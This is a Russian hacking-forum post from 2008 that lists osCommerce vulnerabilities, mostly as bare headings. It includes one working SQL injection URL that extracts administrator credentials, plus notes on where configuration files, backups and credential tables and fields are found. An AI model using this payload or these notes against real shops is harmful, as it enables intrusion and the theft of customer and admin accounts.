ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей #osCommerce# ]
  #1  
Старый 22.05.2008, 04:52
Аватар для life_is_shit
life_is_shit
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960

Репутация: 468
Отправить сообщение для life_is_shit с помощью ICQ
Post [ Обзор уязвимостей #osCommerce# ]

Обзор уязвимостей osCommerce


=== osCommerce 3.0a3 (admin/templates_boxes_layout.php) Directory Traversal Bug Discloses Files to Remote Users ===



=== osCommerce 2.2 Multiple Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (osCsid) Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (error_message) Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (file_manager.php) File Browsing ===



=== osCommerce <= 2.2 (extras/) information/source code disclosure ===

=== osCommerce <=2.2 SQL Injection Vulnerability (create_account_process.php) ===

=== osCommerce <=2.2 (index.php) HTTP Response Splitting ===



=== osCommerce SQL Injection (customer_testimonials.php) ===

=== osCommerce (Contact_us) Cross Site Scripting Vulnerability ===

=== osCommerce (wrapper.php) PHP Including Vulnerability ===

upd:

=== Oscommerce <= 2.2 (advanced_search_result.php) SQL-injection ===
url: advanced_search_result.php?inc_subcat=1&keywords=% 20&categories_id=-1+union+select+1,concat_ws(%27;%27,user_name,user_ password)+from+administrators+limit+1,1--


Напишу еще от меня:

admin/ - админка.

includes/configure.php - здесь хранится данные к mysql, и общие настройки.

admin/configure.php - здесь хранится данные к mysql, и общие настройки. в старых версиях также лежит пароль к админке в открытом виде.

admin/backups/ - здесь хранятся mysql бекапы, не всегда админы ставят правильные права.

md5(salt+plain):salt - в таком виде хранятся пароли в базе.

customers - таблица юзеров.

customers_email_address, customers_password - поля в таблице customers необходимые для авторизации юзеров.

administrator или admin - таблица админов.

admin_email_address, admin_password - поля в таблице administrator необходимые для авторизации админов.

(c) life_is_shit

Последний раз редактировалось life_is_shit; 10.11.2009 в 17:42..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ